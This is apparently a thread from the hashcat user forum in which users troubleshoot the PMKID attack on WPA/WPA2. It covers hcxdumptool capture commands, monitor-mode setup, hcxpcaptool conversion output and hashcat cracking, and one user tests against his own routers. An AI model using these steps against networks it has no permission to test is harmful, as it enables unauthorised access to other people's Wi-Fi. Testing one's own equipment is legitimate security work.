+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Misc (https://hashcat.net/forum/forum-15.html)
+--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html)
+--- Thread: New attack on WPA/WPA2 using PMKID (/thread-7717.html)
RE: New attack on WPA/WPA2 using PMKID - freeroute - 10-13-2018
(10-13-2018, 01:03 PM)pineapplepride Wrote: Hi everyone,
I've tried doing this and when I enter
hcxdumptool -o test.pcapng -i wlan0 --enable_status=3
I get
interface is not up
failed to init socket
Can anyone help me with this error please?
I'm using a ALFAAWUS036ACH, up and in monitor mode and I'm on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali)).
I used:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
to get it into monitor mode.
Any help is greatly appreciated.
If more information is needed I'll post again
Thanks in advance!
Before monitor mode:
Code:
systemctl stop wpa_supplicant.service
systemctl stop network-manager.serviceThan
Code:
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 upRE: New attack on WPA/WPA2 using PMKID - pineapplepride - 10-13-2018
(10-13-2018, 01:03 PM)pineapplepride Wrote: Hi everyone,
I've tried doing this and when I enter
hcxdumptool -o test.pcapng -i wlan0 --enable_status=3
I get
interface is not up
failed to init socket
Can anyone help me with this error please?
I'm using a ALFAAWUS036ACH, up and in monitor mode and I'm on The-Distribution-Which-Does-Not-Handle-OpenCL-Well (The-Distribution-Which-Does-Not-Handle-OpenCL-Well (Kali)).
I used:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
to get it into monitor mode.
Any help is greatly appreciated.
If more information is needed I'll post again
Thanks in advance!
Update: Thanks that helped, I'm also running it with a filterlist of 1 MAC address right now if that matters.
So I got it to run but it only says "PROBEREQUEST" and "PROBERESPONSE" (never "AUTHENTICATION" or "ASSOCIATIONREQUEST") and of course never "FOUND PMKID"
Do you know what this could mean?
I tried it on 3 AP's so far, should i try more?
Thank you again, I'm really grateful.
RE: New attack on WPA/WPA2 using PMKID - pineapplepride - 10-13-2018
I got the PMKID now. Thanks again.
RE: New attack on WPA/WPA2 using PMKID - Rit - 10-23-2018
It doesn't work, I tried it against 2 wireless routers.
I did get it to work, I had the mask wrong.
RE: New attack on WPA/WPA2 using PMKID - elidell - 10-27-2018
Hey super exciting post.. but i just tested this against three APs to which i know the password. I made a very small word list that contained those passwords and each time hashcat exhausted and yielded 0 recoveries. I am with @Rit here.. doesn't seem to work.. I don't know if i am missing something.. I wait of course until HCXDUMPTOOL yields a PMKID FOUND! running a command like so:
`hcxdumptool -i wlan1mon --filterlist=homewifi.txt --filtermode=2 --enable_status=3 -c 1 -o clownhouse.pcapng `
(which takes a while! I'd almost rather do a de-auth / capture 4way attack)
where homewifi.txt has my routers mac address minus the ":"
I then ran:
`hcxpcaptool -z hc_ready_clownhouse clownhouse.pcapng
summary:
--------
file name....................: clownhouse.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali1-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 12
probe requests...............: 7
probe responses..............: 3
association responses........: 1
reassociation responses......: 1
authentications (OPEN SYSTEM): 1
authentications (BROADCOM)...: 1
EAPOL packets................: 52
EAPOL PMKIDs.................: 1
'
anything im missing? or does it just not work? maybe im late to the game and its already patched on all three routers? doubt that.
RE: New attack on WPA/WPA2 using PMKID - Rit - 10-27-2018
If there is an algorithm for the hand shake, and another for the PMKID, and the common denominator is the password, can't the handshake and tthe PMKID used to reveal the PW ?
RE: New attack on WPA/WPA2 using PMKID - Rit - 10-27-2018
(10-27-2018, 05:04 PM)elidell Wrote: Hey super exciting post.. but i just tested this against three APs to which i know the password. I made a very small word list that contained those passwords and each time hashcat exhausted and yielded 0 recoveries. I am with @Rit here.. doesn't seem to work.. I don't know if i am missing something.. I wait of course until HCXDUMPTOOL yields a PMKID FOUND! running a command like so:
`hcxdumptool -i wlan1mon --filterlist=homewifi.txt --filtermode=2 --enable_status=3 -c 1 -o clownhouse.pcapng `
(which takes a while! I'd almost rather do a de-auth / capture 4way attack)
where homewifi.txt has my routers mac address minus the ":"
I then ran:
`hcxpcaptool -z hc_ready_clownhouse clownhouse.pcapng
summary:
--------
file name....................: clownhouse.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali1-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 81
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 12
probe requests...............: 7
probe responses..............: 3
association responses........: 1
reassociation responses......: 1
authentications (OPEN SYSTEM): 1
authentications (BROADCOM)...: 1
EAPOL packets................: 52
EAPOL PMKIDs.................: 1
'
anything im missing? or does it just not work? maybe im late to the game and its already patched on all three routers? doubt that.
RE: New attack on WPA/WPA2 using PMKID - Rit - 10-27-2018
Looks to me that you only ran hcxpcaptool and not Hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.
RE: New attack on WPA/WPA2 using PMKID - slyexe - 10-27-2018
(10-27-2018, 06:20 PM)Rit Wrote: If there is an algorithm for the hand shake, and another for the PMKID, and the common denominator is the password, can't the handshake and tthe PMKID used to reveal the PW ?
Both are usable to be decrypted with hashcat. Whether you are obtaining a handshake VIA a de-auth of a client to create a hccapx attack or capturing a PMKID clientless they both yeild the same result just in different formats.
@elidell - Rit is correct in that you have created the proper hash to be ran with hashcat. Now you need to create your attack and load your hash to find the password.
RE: New attack on WPA/WPA2 using PMKID - elidell - 10-29-2018
(10-23-2018, 11:07 PM)Rit Wrote: It doesn't work, I tried it against 2 wireless routers.
I did get it to work, I had the mask wrong.
(10-27-2018, 06:31 PM)Rit Wrote: Looks to me that you only ran hcxpcaptool and not Hashcat. hcxpcaptool converts the PMKID to a file that hashcat can work on.
LOL, no i just didn't post the hashcat results. I assure you i put it through hashcat. i made a simple world list that had 4 passwords including the one used by clownhouse "Password123" Turns out though i didn't actually spell it correct in my dummy word list.